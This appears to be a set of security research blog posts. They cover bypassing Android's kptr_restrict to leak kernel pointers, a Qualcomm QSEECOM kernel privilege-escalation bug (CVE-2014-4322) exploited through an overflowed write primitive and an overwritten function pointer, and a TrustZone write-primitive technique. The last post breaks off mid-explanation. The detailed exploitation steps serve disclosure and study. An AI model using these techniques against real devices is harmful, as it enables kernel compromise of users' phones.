The configuration files are actually written using a language specific to Android, called the "Android Init Language". This language is pretty simple and easy to use, and allows full control over the permissions with which services are launched (UID/GID) as well as their parameters and "type" (for more information about the language itself, check out the link above).

Another feature of Android are "system properties" - these are key-value pairs which are maintained by the "property service", which is also a thread within the init process. This service allows basic access-control on various "sensitive" system properties, which prevents users from freely modifying any property they please.

These access-permissions for most properties used to be (until Android 4.4) hard-coded within the property service (since Android 5, the permissions are handled by using SELinux labels instead):

However, some properties get special treatment, namely - the "ctl.start" and "ctl.stop" system properties, which are used to either start or stop system services (defined, as mentioned before, using the "Android Init Language").

These properties are checked strictly using SELinux labels, in order to make sure that the privilege of modifying the status of system services is reserved strictly to certain users.

But here comes the surprising part - when connecting locally to the device using "adb" (Android Debug Bridge), we gain execution as the "shell" user. This user is always permitted start and stop one particular service - "dumpstate". Actually, this is used by a feature offered by the "adb" command-line utility, which enables developers to create bug reports containing full information from the device.

Running "adb" with this command-line argument (or simply executing "bugreport" from the adb shell), actually starts the "dumpstate" service by setting the "ctl.start" system property:

So let's take a look at the configuration for the "dumpstate" service:

Since the service has no "user" or "group" configurations, it is actually executed with the root user-ID and group-ID, which could be quite dangerous...

Luckily, the developers of the service were well aware of the potential security risks of running with such high capabilities, and therefore immediately after starting, the service drops its capabilities by modifying its user-ID, group-ID and capabilities, like so:

In short, the service sets the user and group IDs to those of the shell user, but makes sure that it keeps the CAP_SYSLOG capability explicitly.

Reading on reveals that "dumpstate" actually reads the kernel log using the syslog system call (which it is capable of executing since it has the CAP_SYSLOG capability), and writes the contents read back to the caller. Essentially, this means that within the context of the "adb shell", we can freely read the kernel log simply by executing the "bugreport" program. Nice.

However, this still doesn't solve the problem of getting needed symbols for exploits - since, as mentioned earlier, these symbols should generally be printed using the "%pK" format specifier, which means they would appear "censored" in the kernel log.

But alas, most pointers within the kernel are certainly not printed using the special format specifier, but instead use the regular "%p" format, and are therefore left uncensored. This means that the kernel log is typically a treasure trove of useful kernel pointers.

For example, when the kernel boots, the memory map of the kernel's different segments is printed, like so:

Now, assuming there's a single symbol we would like to find, we could simply dump the list of all kernel symbols using the virtual file containing all the symbols - /proc/kallsyms. When kptr_restrict is enabled, the list returned by kallsyms is censored (since it is printed using "%pK"), and therefore won't show any kernel pointers.

Censored symbols from kallsyms

However, the symbols returned by kallsyms are ordered by their addresses, even if those addresses aren't shown. Moreover, this task is made easier due to the fact that each segment is prefixed and postfixed by specially named marker symbols:

Segment Name	Start Marker	End Marker
.text	_text	_etext
.init	__init_begin	__init_end
.data	_sdata	_edata
.bss	___bss_start	__bss_end

We can then use this list to deduce the location of different symbols by simply counting the number of symbols from the start or end marker to our wanted symbol, while adding up the sizes of each of the symbols encountered.

Another technique would be to cause a wanted kernel pointer to be written to the kernel log. For example, on Qualcomm-based devices (based on the "msm" kernel), whenever the video device is opened, the kernel virtual address of the video device is written to the kernel log:

msm_vidc_open leaks the pointer to the kernel log

Method #2 - Retrieving the kernel symbols statically

Why use this method?

In many cases, although the device itself is accessible, it may be heavily locked - for example, in extreme cases, adb access may be disabled (however poorly), which would complicate the usage of the first method (unless we manage to gain shell access). In this case, we may wish to build the complete list of kernel symbols from the kernel image itself, statically, without interacting directly with the device.

Also, since KASLR (Kernel Address Space Layout Randomization) is currently still unused in Android devices, there is no need to consider any kind of runtime modification to the location of the symbols present in the kernel image. This means that the kernel image must contain all the information needed to build the complete list of symbols, including their addresses, exactly as they would appear on a real "live" device.

How do I get a kernel image?

Assuming you have the full access to a live device, you could read the kernel image directly from the MMC, via /dev/block. However, in most cases reading the MMC blocks directly requires root permissions, which would make this method pretty obsolete, since with root access we could already disable kptr_restrict.

The more reasonable path to obtaining the kernel image would be to simply download the firmware file for your particular device, and unpack it. There are many tools which enable firmware unpacking for different devices (for example, I wrote a script to unpack to Nexus 5's bootloader - here), but many such tools are available, and are typically a google-search away.

Just one word of caution - make sure you download the exact kernel image matching the kernel on your device. You can find the running kernel's version by simply running "uname -a":

I have the image - now what?

In order to understand how to extract the full symbol list from a kernel image, we must first inspect the way in which a kernel image is built. Looking over the code, reveals that a special program is used to emit the symbols needed in a special format into the kernel's image, as part of the build process. The program which receives the symbol map containing the location of each kernel symbol in the kernel's virtual address space, and outputs an assembly file containing the compressed symbol table, which is assembled into the resulting kernel image.

This means that all we need to do in order to rebuild this table from a raw kernel binary is to understand the exact format in which this symbol table is written. However, for a normally compiled kernel with no additional symbols, this turns out to be a little tricky.

Since the labels written by the script are not visible in the resulting kernel binary, the first thing we'd have to solve is how to find the beginning of the symbol table within the binary. Luckily, the solution turns out to be pretty simple - remember when we previously had a look at the symbol table from kallsyms? The first two symbols were marker symbols pointing to the beginning of the kernel's text segment. Since the kernel's code is loaded at a known address (typically, 0xC0008000), we can search for this value appearing at least twice consecutively within the binary, and attempt to parse the symbol table's structure starting at that address.

Going over the symbol table itself, reveals that it is terminated by a NULL address. Then, immediately following the symbol table, the actual number of symbols is written, which means we can easily verify that the table is actually well-formed.

Then, two tables of "markers" and "symbols" are written into the file. This is done in order to compress the size of the symbols within the table, and by doing so reduce the size of the kernel binary. The compression maps the 256 most used substrings (which are called tokens), into a single byte value. Then, each symbol's name is compressed into a pascal-style string of bytes (meaning, a byte marking the length of the string, then an actual string of characters). Each byte in the compressed name maps to a single tokens, which in turn corresponds to a single "most commonly used" substring. Putting it together, it looks like this:

According to kernel developers, this usually produces a compression ratio of about 50%.

I've written a python script which, given a raw kernel binary, extracts the full symbol table from the binary, in the exact same format as they are written within kallsyms. You can find it here. Please let me know if you find the script useful!

Method #3 - Finding information disclosures within the kernel

This is the "classical" method which is commonly used in order to bypass the restrictions imposed by kptr_restrict. For a remote attacker wishing to target a wide variety of devices, it is quite often the best choice, since:

The first method typically requires shell access to the device, in order to execute the "bugreport" service
The second method requires you to obtain the kernel image, which could be tiresome to do for a very wide variety of devices

Sadly, it appears that kernel developers are far less aware of the possible risks of leaking kernel pointers than they are of other (e.g., memory corruption) vulnerabilities.

As a result, finding a kernel memory leak is usually a very short and simple task. To prove this point, after poking around for five minutes on a live device, I've come across such a leak, which is accessible from any context.

Whenever a socket is opened within Android, it is tagged using a netfilter driver called "qtaguid". This driver accounts for all the data sent or received by every socket (and tag), and allows some restrictions to be placed on sockets, based on the tag assigned to them. Android uses this feature in order to account for data usage by the device. The actual per-process breakdown is done by assigning each process a specific tag, and monitoring the data used by the process based on that tag.

The driver also exposes a control interface, with which a user can query the current sockets and their tags, along with the user-ID and process-ID from which the socket has been opened. This control interface is facilitated by a world-accessible file, under /proc/net/xt_qtaguid/ctrl.

However, reading this file reveals that it actually contains the kernel virtual address for each of the sockets which completely uncensored:

Looking at the source code for the virtual file's "read" implementation, reveals that the address is written without using the special "%pK" format specifier:

For those interested - the actual pointer written is to the "sock" structure, which is the kernel structure containing the actual "socket" structure, which in turns contains all the function pointers to the operations within this socket.

This means that if, for example, we have a vulnerability that allows us to overwrite a specific kernel address (like the vulnerability presented in the previous blog post), we could simply:

Open a socket and tag it with "qtaguid"
Look for the socket's address within /proc/net/xt_qtaguid/ctrl
Overwrite the pointer to the "socket" structure to an address within our address-space
Populate the overwritten address with a dummy "socket" structure containing fully controller function pointers
Perform any operation on the socket (like closing it), in order to cause the kernel to execute our own code

Summing it all up

Just like any other mitigation, kptr_restrict adds a layer of defence which can sometimes slow down an attacker, but is generally not a show-stopper for anyone determined enough. However, unlike most other mitigations, kptr_restrict requires the cooperation of kernel developers to be effective. Right now, things aren't so great. Hopefully this changes :)

Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

2015-08-16T03:07:00.000+03:00

In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel.

The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm" kernel) since February 2012.

I'd like to point out that I've responsibly disclosed this issue to Qualcomm, and they've been great as usual, and fixed the issue pretty quickly (see "Timeline" below). Those of you who are interested in the fix, should definitely check out the link above.

Where are we at?

Continuing our journey of getting from zero permissions to TrustZone code execution; after recently completing the task of getting to TrustZone from the Linux kernel, we are now looking for a way to gain code execution within the Linux kernel.

However, as you will see shortly, the vulnerability presented in this post requires some permissions to exploit, namely, it can be exploited from within a process called "mediaserver". This means that it still doesn't complete our journey, and so the next few blog posts will be dedicated to completing the exploit chain, by gaining code execution in mediaserver from zero permissions.

Lets go bug hunting

Since we would like to attack the Linux kernel, it stands to reason that we would take a look at all the drivers which are accessible to "underprivileged" Android users. First, let's take a look at all the drivers which are world accessible (under "/dev"):

Unfortunately, this list is rather short - actually, these drivers are all "generic" Android drivers, which are present on all devices (with the exception of "kgsl-3d0"), and have therefore been the subject of quite a lot of prior research.

After spending a while looking at each of these drivers, it became apparent that a more effective strategy would be to cast a wider net by expanding the number of drivers to be researched, even if they require some permissions in order to interact with. Then, once a vulnerability is found, we would simply need one more vulnerability in order to get from zero permissions to TrustZone.

One interesting candidate for research is the "qseecom" driver. For those of you who read the first blog post, we've already mentioned this driver before. This is the driver responsible for allowing Android code to interact with the TrustZone kernel, albeit using only a well defined set of commands.

So why is this driver interesting? For starters, it ties in well with the previous blog posts, and everybody loves continuity :) That aside, this driver has quite a large and fairly complicated implementation, which, following the previous posts, we are sufficiently qualified to understand and follow.

Most importantly, taking a look at the permissions needed to interact with the driver, reveals that we must either be running with the "system" user-ID which is a very high requirement, or we must belong to the group called "drmrpc".

However, searching for the "drmrpc" group within all the processes on the system, reveals that the following processes are members of the group:

surfaceflinger (running with "system" user-ID)
drmserver (running with "drm" user-ID)
mediaserver (running with "media" user-ID)
keystore (running with "keystore" user-ID)

But that's not all! Within the Linux kernel, each process has a flag named "dumpable", which controls whether or not the process can be attached to using ptrace. Whenever a process changes its permissions by executing "setuid" or "setgid", the flag is automatically cleared by the kernel to indicate that the process cannot be attached to.

While the "surfaceflinger" and "drmserver" processes modify their user-IDs during runtime, and by doing so protect themselves from foreign "ptrace" attachments, the "mediaserver" and "keystore" processes do not.

This is interesting since attaching to a process via "ptrace" allows full control of the process's memory, and therefore enables code execution within that process. As a result, any process running with the same user-ID as one of these two processes can take control of them and by doing so, may access the "qseecom" driver.

Summing it up, this means that in order to successfully access the "qseecom" driver, an attacker must only satisfy one of the following conditions:

Gain execution within one of "mediaserver", "drmserver", "mediaserver" or "keystore"
Run within a process with the "system", "drm" or "keystore" user-ID
Run within a process with the "drmrpc" group-ID

Tricksy Hobbitses

Before we start inspecting the driver's code, we should first recall the (mis)trust relationship between user-space and kernel-space.

Since drivers deal with user input, they must take extreme caution to never trust user supplied data, and always verify it extensively - all arguments passed in by the user should be considered by the kernel as "tainted". While this may sound obvious, it's a really important issue that is overlooked often times by kernel developers.

In order to stop kernel developers from making these kinds of mistakes, some mechanisms were introduced into the kernel's code which help the compiler detect and prevent such attempts.

This is facilitated by marking variables which point to memory within the user's virtual address space as such, by using the "__user" macro.

When expanded, this macro marks the variable with the "noderef" attribute. The attribute is used to tag the pointer as one that cannot be directly dereferenced. If an attempt is made to directly dereference a pointer marked as such, the compiler will simply produce an error and refuse to compile the code.

Instead, whenever the kernel wishes to either read from or write to the pointer's location, it must do so using specially crafted kernel functions which make sure that the location pointed to actually resides within the user's address space (and not within any memory address belonging to the kernel).

Getting to know QSEECOM

Drivers come in many shapes and sizes; and can be interacted with by using quite a wide variety of functions, each of which with its unique pitfalls and common mistakes.

When character devices are registered within the kernel, they must provide a structure containing pointers to the device's implementation for each of the aforementioned functions, determining how it interacts with the system.

This means that an initial step in mapping out the attack surface for this driver would be to take a look at the functions registered by it:

In the case of the QSEECOM driver, the only "interesting" function implemented is the "ioctl" function call. Generally, character devices can be interacted with just as any other file on the system - they can be opened, read from, written to, etc. However, when an operation doesn't neatly map into one of the "normal" file operations, it can be implemented within a special function called "IOCTL" (Input/Output Control).

IOCTLs are called using two arguments:

The "command" to be executed
The "argument" to be supplied to that function

The complete list of supported "commands" can be deduced by reading the source code of the IOCTL's implementation.

Having said that, lets take a look at the different commands supported by the qseecom_ioctl function. At first glance, it seems as though quite a large range of commands are supported by the driver, such as:

Sending command requests to TrustZone
Loading QSEE TrustZone applications
Provisioning different encryption keys
Setting memory parameters for the client of the driver

Setting Memory Parameters

In order to allow the user to send large requests to or receive large responses from the TrustZone kernel, the QSEECOM driver exposes a IOCTL command which enables the user to set up his "memory parameters".

In order to share a large chunk of memory with the kernel, the user first allocates a contiguous physical chunk of memory by using the "ion" driver.

We won't go into detail about the "ion" driver, but here's the gist of it - it is an Android driver which is used to allocate contiguous physical memory and expose it to the user by means of a file descriptor. After receiving a file descriptor, the user may then map it to any chosen virtual address, then use it as he pleases. This mechanism is advantageous as a means of sharing memory since anyone in possession of the file descriptor may map it to any address within their own virtual address space, independently of one another.

The "ion" driver also supports different kinds of pools from which memory can be allocated, and a wide variety of flags - for those interested, you can read much more about "ion" and how it works, here.

In the case of QSEECOM, three parameters are used to configure the user's memory parameters:

virt_sb_base - The virtual address at which the user decided to map the ION allocated chunk
sb_len - The length of the shared buffer used
ifd_data_fd - The "ion" file descriptor corresponding to the allocated chunk

The driver actually verifies that the whole range from "virt_sb_base" to "virt_sb_base + sb_len" is accessible to the user (and doesn't, for example, overlap with the kernel's memory).

Then, after performing the needed validations, the driver maps the ION buffer to a kernel-space virtual address, and stores all the memory parameters in an internal data structure, from which they can later be retrieved whenever the user performs additional IOCTL calls:

Note that four different parameters are stored here:

The kernel-space virtual address at which the ION buffer is mapped
The actual physical address of the ION buffer
The user-space virtual address at which the ION buffer is mapped
The length of the shared buffer

Since this is quite a lot to remember (and it's only going to get worse :) ), let's start mapping out the current state of the virtual address space:

QSEECOM_IOCTL_SEND_MODFD_CMD_REQ

After going over the code for each of the different supported commands, one command in particular seemed to stick-out as a prime candidate for exploitation - QSEECOM_IOCTL_SEND_MODFD_CMD_REQ.

This command is used in order to request the driver to send a command to TrustZone using user-provided buffers. As we know, any interaction of the kernel with user-provided data, let alone user-provided memory addresses, is potentially volatile.

After some boilerplate code and internal housekeeping, the actual function in charge of handling this particular IOCTL command is called - "qseecom_send_modfd_command".

The function first safely copies the IOCTL argument supplied by the user into a local structure, which looks like this:

The "cmd_req_buf" and "cmd_req_len" fields define the request buffer for the command to be sent, and similarly, "resp_buf" and "resp_len" define the response buffer to which the result should be written.

Now stop! Do you notice anything fishy in the structure above?

For starters, there are two pointers within this structure which are not marked as "tainted" in any way (not marked as "__user"), which means that the driver might mistakenly access them later on.

What comes next, however, is a quite an intimidating wall of verifications which are meant to make sure that the given arguments are, in fact, valid. It seems as though Quacomm win this round...

Or do they?

Well, let's look at each of the validations performed:

First, the function makes sure that the request and response buffers are not NULL.
Next, the function makes sure that both the request and response buffers are within the range of the shared buffer discussed earlier.
Then, the function makes sure that the request buffer's length is larger than zero, and that both the request and the response size do not exceed the shared buffer's length.
Lastly, for each file descriptor passed, the function validates that the command buffer offset does not exceed the length of the command buffer.

Before even attempting to scale this wall of verifications, lets first see what's on the other side of it.

After performing all these validations, the function goes on to convert the request and response buffers from user virtual addresses to kernel virtual addresses:

Where the actual conversion taking place looks like so:

This actually simply amounts to taking the offset from the given virtual address to the beginning of the user-space virtual address for the shared buffer, and adding it to the kernel-space virtual address for the shared buffer. This is because, as mentioned earlier, the kernel maps the ION buffer to a kernel-space virtual address which is unrelated to the user-space virtual address to which the user mapped the buffer. So before the kernel can interact with any pointer within the shared buffer, it must first convert the address to a virtual address within it's own address space.

What comes next, however, is extremely interesting! The driver passes on the request and response buffers, which should now reside within kernel-space, to an internal function called "__qseecom_update_cmd_buf" - and therein lies the holy grail! The function actually writes data to the converted kernel-space address of the request buffer.

We'll expand more on the exact nature of the data written later on, but hopefully by now you're convinced if we are able to bypass the verifications above while still maintaining control of the final kernel-space address of the request buffer, we would achieve a kernel write primitive, which seems quite tempting.

"Bring down this wall!"

First, let's start by mapping out the locations of the request and response buffers within the virtual address space:

Now, as we already know, when setting the memory parameters, the buffer starting at "virt_sb_base" and ending at "virt_sb_base + sb_len" must reside entirely within user-space. This is facilitated by the following check:

Also, the verifications above make sure that both the "cmd_req_buf" and "resp_buf" pointers are within the user-space virtual address range of the shared buffer.

However, what would happen if we were to map a huge shared buffer - one so large that it cannot be contained within kernel space? Well, a safe assumption might be that when we'd attempt to set the memory parameters for this buffer, the request would fail, since the kernel will not be able to map the buffer to it's virtual address space.

Luckily, though, the IOCTL with which the memory parameters are set only uses the user-provided buffer length in order to verify that the user-space range of the shared buffer is accessible by the user (see the access check above). However, when it actually maps the buffer to its own address-space, it does so by simply using the ION file descriptor, without verifying that the buffer's actual length equals the one provided by the user.

This means we could allocate a small ION buffer, and pass it to QSEECOM while claiming it actually corresponds to a huge area. As long as the entire area lies within user-space and is write-accessible to the user, the driver will happily accept these parameters and store them for us. But is this feasible? After all, we can't really allocate such a huge chunk of memory within user-space - there's just not enough physical memory to satisfy such a request. What we could do, however, is reserve this memory area by using mmap. This means that until the data is actually written to, it is not allocated, and therefore we can freely map an area of any size for the duration of the validation performed above, then unmap it once the driver is satisfied that the area is indeed writeable.

From now on, let's assume we map the fake shared buffer at the virtual address 0x10000000 and the mapping size is 0x80000000.

Recall that if the command and response buffer are deemed valid, they are converted to the corresponding kernel-space virtual addresses, then the converted request buffer is written to at the given offset. Putting it all together, we are left with the following actual write destination:

Can you spot the mistake in the calculation above? Here it goes -

Since the kernel believes the shared buffer is huge, this means that the "cmd_req_buf" may point to any address within that range, and in our case, any address within the range [0x10000000, 0x90000000]. It also means that the "cmd_buf_offset" can be as large as 0x80000000, which is the fake size of the shared buffer.

Adding up two such huge numbers would doubtless cause an overflow in the calculation above, which means that the resulting address may not be within the kernel's shared buffer after all!

(Before you read on, you may want to try and work the needed values to exploit this on your own.)

Finding the kernel's shared buffer

As you can see in the calculation above, the location of the kernel's shared buffer is still unknown to us. This is because it is mapped during runtime, and this information is not exposed to the user in any way. However, this doesn't mean we can't find it on our own.

If we were to set the "cmd_buf_offset" to zero, that would mean that the destination write address for the kernel would be:

sb_virt - 0x10000000 + cmd_req_buf + 0x0

Now, since we know the "sb_virt" address is actually within the kernel's heap, it must be within the kernel's memory range (that is, larger than 0xC0000000). This means that for values of "cmd_req_buf" that are larger than (0xFFFFFFFF - 0xD0000000), the calculation above would surely overflow, resulting in a low user-space address.

This turns out to be really helpful. We can now allocate a sterile "dropzone" within the lower range of addresses in user-space, and fill it with a single known value.

Then, after we trigger the driver's write primitive, using the parameters described above, we could inspect the dropzone and find out where it has been "disturbed" - that is, where has a value been changed. Since we know only a single overflow happened in the destination address calculation, this means that we can simply reverse the calculation (and add 0xFFFFFFFF + 1) to find the original address of "sb_virt".

Creating a controlled write primitive

Now that we know the exact address of "sb_virt", we are free to manipulate the arguments accordingly in order to control the destination address freely. Recall that the destination address is structured like so:

Now, since all the arguments are known, and the sum "cmd_req_buf" and "cmd_buf_offset" can exceed 0xFFFFFFFF, this means that we can simply modify any address following sb_virt, by setting the following values:

user_virt_sb_base = 0x10000000
cmd_req_buf + cmd_buf_offset = (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset

This means that the destination write address would be:

dest_addr = sb_virt - user_virt_sb_base + cmd_req_buf + cmd_buf_offset

Substituting the variables with the values above:

dest_addr = sb_virt - 0x10000000 + (0xFFFFFFFF + 1) + 0x10000000 + wanted_offset

Which equals:

dest_addr = sb_virt + (0xFFFFFFFF + 1) + wanted_offset

But since adding 0xFFFFFFFF + 1 will cause an overflow which will result in the same original value, we are therefore left with:

dest_addr = sb_virt + wanted_offset

Meaning we can easily control the destination to which the primitive will write its data, by choosing the corresponding "wanted_offset" for each destination address.

Exploiting the write primitive

Now that we have a write primitive, all that's left is for us to exploit it. Fortunately, our write primitive allows us to overwrite any kernel address. However, we still cannot control the data written - actually, going over the code of the vulnerable "__qseecom_update_cmd_buf" reveals that it actually writes a physical address related to the ION buffer to the target address:

However, recall that previously, when we discovered the address of "sb_virt", we did so by detecting a modified DWORD at a preallocated "sterile" dropzone. This means that the actual value of this physical address is in fact known to us at this point as well. Moreover, all physical addresses corresponding to the "System RAM" on Qualcomm devices are actually "low" addresses, meaning, they are all definitely lower than the kernel's virtual base address (0xC0000000).

With that in mind, all that's left for us is to overwrite a function pointer within the kernel with our write primitive. Since the DWORD written will correspond to an address which is within the user's virtual address space, we can simply allocate an executable code stub at that address, and redirect execution from that function stub to any other desired piece of code.

One such location containing function pointers can be found within the "pppolac_proto_ops" structure. This is the structure used within the kernel to register the function pointers used when interacting with sockets of the PPP_OLAC protocol. This structure is suitable because:

The PPP_OLAC protocol isn't widely used, so there's no immediate need to restore the overwritten function pointer
There are no special permissions needed in order to open a PPP_OLAC socket, other than the ability to create sockets
The structure itself is static (and therefore stored in the BSS), and is not marked as "const", and is therefore writeable

Putting it all together

At this point, we have the ability to execute arbitrary code within the kernel, thus completing our exploit. Here's a short recap of the steps we needed to perform:

Open the QSEECOM driver
Map a ION buffer
Register faulty memory parameters which include a fake huge memory buffer
Prepare a sterile dropzone in low user-space addresses
Trigger the write primitive into a low user-space address
Inspect the dropzone in order to deduce the address of "sb_virt" and the contents written in the write primitive
Allocate a small function stub at the address which is written by the write primitive
Trigger the write primitive in order to overwrite a function pointer within "pppolac_proto_ops"
Open a PPP_OLAC socket and trigger a call to the overwritten function pointer
Execute code within the kernel :)

Into the Wild

Shortly after the patch was issued and the vulnerability was fixed, I was alerted by a friend on mine to the fact that an exploit has been developed for the vulnerability and the exploit has been incorporated into a popular rooting kit (giefroot), in order to achieve kernel code execution.

Luckily, the exploit for the vulnerability was quite poorly written (I've fully reverse engineered it), and so it didn't support all the range of vulnerable devices.

Now that the issue has been fixed for a while, I feel that it's okay to share the full vulnerability writeup and exploit code, since all devices with kernels compiled after November 2014 should be patched. I've also made sure to use a single symbol within the exploit, to prevent widespread usage by script-kiddies (although this constraint can easily be removed by dynamically finding the pointer mentioned above during the exploit).

The Code

I've written an exploit for this vulnerability, you can find it here.

Building the exploit actually produces a shared library, which exports a function called "execute_in_kernel". You may use it to execute any given function within the context of the kernel. Play safe!

Timeline

24.09.14 - Vulnerability disclosed
24.09.14 - Initial response from QC
30.09.14 - Issue triaged by QC
19.11.14 - QC issues notice to customers
27.12.14 - Issue closed, CAF advisory issued

Full TrustZone exploit for MSM8974

2015-08-10T10:19:00.000+03:00

In this blog post, we'll cover the complete process of exploiting the TrustZone vulnerability described in the previous post. If you haven't read it already, please do!

Responsible Disclosure

First of all, I'd like to point out that I've responsibly disclosed this vulnerability to Qualcomm, and the issue has already been fixed (see "Timeline" below).

I'd also like to take this opportunity to point out that Qualcomm did an amazing job in both responding to the disclosure amazingly fast and by being very keen to fix the issue as soon as possible.

They've also gifted me a brand new (at the time) Moto X 2014, which will be the subject of many posts later on (going much more in depth into TrustZone's architecture and other security components on the device).

Patient Zero

While developing this exploit, I only had my trusty (personal) Nexus 5 device to work with. This means that all memory addresses and other specific information written below is taken from that device.

In case anyone wants to recreate the exact research described below, or for any other reason, the exact version of my device at the time was:

google/hammerhead/hammerhead:4.4.4/KTU84P/1227136:user/release-keys

With that out of the way, let's get right to it!

The vulnerability primitive

If you read the previous post, you already know that the vulnerability allows the attacker to cause the TrustZone kernel to write a zero DWORD to any address in the TrustZone kernel's virtual address space.

Zero write primitives are, drawing on personal experience, not very fun to work with. They are generally quite limited, and don't always lead to exploitable conditions. In order to create a robust exploit using such a primitive, the first course of action would be to attempt to leverage this weak primitive into a stronger one.

Crafting an arbitrary write primitive

Since the TrustZone kernel is loaded at a known physical address, this means that all of the addresses are already known in advance, and do not need to be discovered upon execution.

However, the internal data structures and state of the TrustZone kernel are largely unknown and subject to change due to the many different processes interacting with the TrustZone kernel (from external interrupts, to "Secure World" applications, etc.).

Moreover, the TrustZone code segments are mapped with read-only access permissions, and are verified during the secure boot process. This means that once TrustZone's code is loaded into memory, it theoretically cannot (and should not) be subject to any change.

TrustZone memory mappings and permissions

So that said - how can we leverage a zero write primitive to enable full code execution?

We could try and edit any modifiable data (such as the heap, the stack or perhaps globals) within the TrustZone kernel, which might allow us to create a stepping stone for a better primitive.

As we've mentioned in the previous blog post, normally, when an SCM command is called, any argument which is a pointer to memory, is validated by the TrustZone kernel. The validation is done in order to make sure the physical address is within an "allowed" range, and isn't for example, within the TrustZone kernel's used memory ranges.

These validations sound like a prime candidate for us to look into, since if we were able to disable their operation, we'd be able to leverage other SCM calls in order to create different kinds of primitives.

TrustZone memory validation

Let's start by giving the memory validation function a name - from now on, we'll call it "tzbsp_validate_memory".

Here's a decompilation of the function:

The function actually calls two internal functions to perform the validation, which we'll call "is_disallowed_range" and "is_allowed_range", respectively.

is_disallowed_range

As you can see, the function actually uses the first 12 bits of the given address in the following way:

The upper 7 bits are used as an index into a table, containing 128 values, each 32-bit wide.
The lower 5 bits are used as the bit index to be checked within the 32-bit entry which is present at the previously indexed location.

In other words, for each 1MB chunk that intersects the region of memory to be validated, there exists a bit in the aforementioned table which is used to denote whether or not this region of data is "disallowed" or not. If any chunk within the given region is disallowed, the function returns a value indicating as such. Otherwise, the function treats the given memory region as valid.

is_allowed_range

Although a little longer, this function is also quite simple. Essentially, it simply goes over a static array containing entries with the following structure:

The function iterates over each of the entries in the table which resides at the given memory address, stopping when the "end_marker" field for the current entry is 0xFFFFFFFF.

Each range specified by such an entry, is validated against to make sure that the memory range is allowed. However, as evidenced in the decompilation above, entries in which the "flags" fields' second bit is set, are skipped!

Attacking the validation functions

Now that we understand how the validation functions operate, let's see how we can use the zero write primitive in order to disable their operation.

First, as described above, the "is_disallowed_range" function uses a table of 32-bit entries, where each bit corresponds to a 1MB block of memory. Bits which are set to one represent disallowed blocks, and zero bits represent allowed blocks.

This means that we can easily neutralise this function by simply using the zero write primitive to set all the entries in the table to zero. In doing so, all blocks of memory will now be marked as allowed.

Moving on to the next function; "is_allowed_range". This one is a little tricky - as mentioned above, blocks in which the second bit in the flags field is set, are validated against the given address. However, for each block in which this bit is not set, no validation is performed, and the block is skipped over.

Since in the block table present in the device, only the first range is relevant to the memory ranges which reside within the TrustZone kernel's memory range, we only need to zero out this field. Doing so will cause it to be skipped over by the validation function, and, as a result, the validation function will accept memory addresses within the TrustZone kernel as valid.

Back to crafting a write primitive

So now that we've gotten rid of the bounds check functions, we can freely supply any
memory address as an argument for an SCM call, and it will be operated upon without any obstacle.

But are we any closer to creating a write primitive? Ideally, had there been an SCM call where we could control a chunk of data which is written to a controlled location, that would have sufficed.

Unfortunately, after going over all of the SCM calls, it appears that there are no candidates which match this description.

Nevertheless, there's no need to worry! What cannot be achieved with a single SCM call, may be possible to achieve by stringing a few calls together. Logically, we can split the creation of an arbitrary write primitive into the following steps:

Create an uncontrolled piece of data at a controlled location
Control the created piece of data so that it actually contains the wanted content
Copy the created data to the target location

Create

Although none of the SCM calls seem to be good candidates in order to create a controlled piece of data, there is one call which can be used to create an uncontrolled piece of data at a controlled location - "tzbsp_prng_getdata_syscall".

This function, as its name implies, can be used to generate a buffer of random bytes at a given location. It is generally used by Android is order to harness the hardware PRNG which is present in Snapdragon SoCs.

In any case, the SCM call receives two arguments; the output address, and the output length (in bytes).

On the one hand, this is great - if we (somewhat) trust the hardware RNG, we can be pretty sure that for each byte we generate using this call, the entire range of byte values is possible as an output. On the other hand, this means that we have no control whatsoever on what data is actually going to be generated.

Control

Even though any output is possible when using the PRNG, perhaps there is some way in which we could be able to verify that the generated data is actually the data that we wish to write.

In order to do so, let's think of the following game - imagine you have a slot machine with four slots, each with 256 possible values. Each time you pull the lever, all the slots rotate simultaneously, and a random output is presented. How many times would you need to pull the lever in order for the outcome to perfectly match a value that you picked beforehand? Well, there are 4294967296 (2^32) possible values, so each time you pull the lever, there's a chance of about 10^(-10) that the result would match your wanted outcome. Sounds like you're going to be here for a while...

But what if you could cheat? For example, what if you had a different lever for each slot? That way you can only change the value of a single slot with each pull. This means that now for each time the lever is pulled, there's a chance of 1/256 that the outcome will match the desired value for that slot.

Sounds like the game is much easier now, right? But how much easier? In probability theory this kind of distribution for a single "game" is called a Bernoulli Distribution, and is actually just a fancy way of saying that each experiment has a set probability of success, denoted p, and all other outcomes are marked all failures, and have a probability of 1-p of occurring.

Assuming we would like a 90% chance of success, it turns out that the in original version of the game we would require approximately 10^8 attempts (!), but if we cheat, instead, we would only require approximately 590 attempts per slot, which is several orders of magnitude less.

So have you figured out how this all relates to our write primitive yet? Here it goes:

First, we need to find an SCM call which returns a value from a writeable memory location within the TrustZone kernel's memory, to the caller.

There are many such functions. One such candidate is the "tzbsp_fver_get_version" call. This function can be used by the "Normal World" in order to retrieve internal version numbers of different TrustZone components. It does so by receiving an integer denoting the component whose version should be retrieved, and an address to which the version code should be written. Then, the function simply goes over a static array of pairs containing the component ID, and the version code. When a component with the given ID is found, the version code is written to the output address.

tzbsp_fver_get_version internal array

Now, using the "tzbsp_prng_getdata_syscall" function, we can start manipulating any version code's value, one byte at a time. In order to know the value of the byte that we've generated at each iteration, we can simply call the aforementioned SCM, while passing in the component ID matching the component whose version code we are modifying, and supplying a return address which points to a readable (that is, not in TrustZone) memory location.

We can repeat these first two steps until we are satisfied with the generated byte, before moving on to generate the next byte. This means that after a few iterations, we can be certain that the value of a specific version code matches our wanted DWORD.

Copy

Finally, we would like to write the generated value to a controlled location. Luckily, this step is pretty straight-forward. All we need to do is simply call the "tzbsp_fver_get_version" SCM call, but now we can simply supply the target address as the return address argument. This will cause the function to write our generated DWORD to a controlled location, thus completing our write gadget.

Phew... What now?

From here on, things get a little easier. First, although we have a write primitive, it is still quite cumbersome to use. Perhaps it would be a little easier if we were able to create a simpler gadget using the previous one.

We can do this by creating our own SCM call, which is simply a write-what-where gadget. This may sound tricky, but it's actually pretty straight-forward.

